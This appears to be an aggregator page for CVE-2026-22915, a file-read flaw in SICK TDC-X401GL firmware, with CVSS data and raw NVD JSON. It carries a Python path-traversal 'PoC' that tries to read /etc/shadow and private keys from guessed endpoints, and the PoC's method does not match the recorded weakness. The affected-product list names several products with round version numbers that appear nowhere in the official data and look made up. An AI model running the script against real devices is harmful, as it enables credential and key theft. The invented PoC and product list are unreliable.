Security Vulnerability Report
中文
CVE-2026-22915 CVSS 4.3 MEDIUM

CVE-2026-22915

Published: 2026-01-15 13:16:06
Last Modified: 2026-01-23 15:17:20
Source: [email protected]

Description

An attacker with low privileges may be able to read files from specific directories on the device, potentially exposing sensitive information.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:* - NOT VULNERABLE
SICK SICK ID: de.sick.psirt.app.SecureStorage < 1.0.0
SICK SICK AppSpace < 2.0.0
SICK Flexi Soft < 3.0.0
SICK SIM2000 < 4.0.0
SICK SICK Profiler < 5.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22915 Path Traversal PoC # Target: SICK devices with low-privilege access # CVSS: 4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N) import requests import sys def test_path_traversal(target_url): """Test for path traversal vulnerability CVE-2026-22915""" # Common sensitive files to test sensitive_files = [ '../../../etc/passwd', '../../../etc/shadow', '../../config/system.xml', '../../../var/log/messages', '../../../../etc/hosts', '../../../etc/ssl/private/key.pem' ] headers = { 'User-Agent': 'Mozilla/5.0 (compatible; CVE-2026-22915-PoC)', 'Authorization': 'Basic ' + 'BASE64_ENCODED_LOW_PRIV_CREDENTIALS' } print(f"[*] Testing CVE-2026-22915 on {target_url}") print(f"[*] CVSS Score: 4.3 (Medium)") print(f"[*] Attack Vector: Network-based, Low Privilege Required") print("-" * 60) for payload in sensitive_files: # Try common file read endpoints endpoints = [ f"{target_url}/file/view?path={payload}", f"{target_url}/api/files{ payload}", f"{target_url}/logs?file={payload}", f"{target_url}/download{ payload}" ] for endpoint in endpoints: try: response = requests.get(endpoint, headers=headers, timeout=10, verify=False) if response.status_code == 200: if 'root:' in response.text or '<?xml' in response.text: print(f"[!] VULNERABLE: {endpoint}") print(f"[+] Content preview: {response.text[:200]}...") return True except requests.exceptions.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("[*] No obvious vulnerability detected (may require specific credentials)") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-22915.py <target_url>") print("Example: python cve-2026-22915.py https://192.168.1.100") sys.exit(1) target = sys.argv[1] test_path_traversal(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22915", "sourceIdentifier": "[email protected]", "published": "2026-01-15T13:16:06.387", "lastModified": "2026-01-23T15:17:20.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An attacker with low privileges may be able to read files from specific directories on the device, potentially exposing sensitive information."}, {"lang": "es", "value": "Un atacante con privilegios bajos podría leer archivos de directorios específicos en el dispositivo, exponiendo potencialmente información sensible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "59BB5012-A895-4A93-B36F-A062A9389DB1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:*", "matchCriteriaId": "9A95E220-0816-4885-AB7C-D0BB6F27DB7A"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.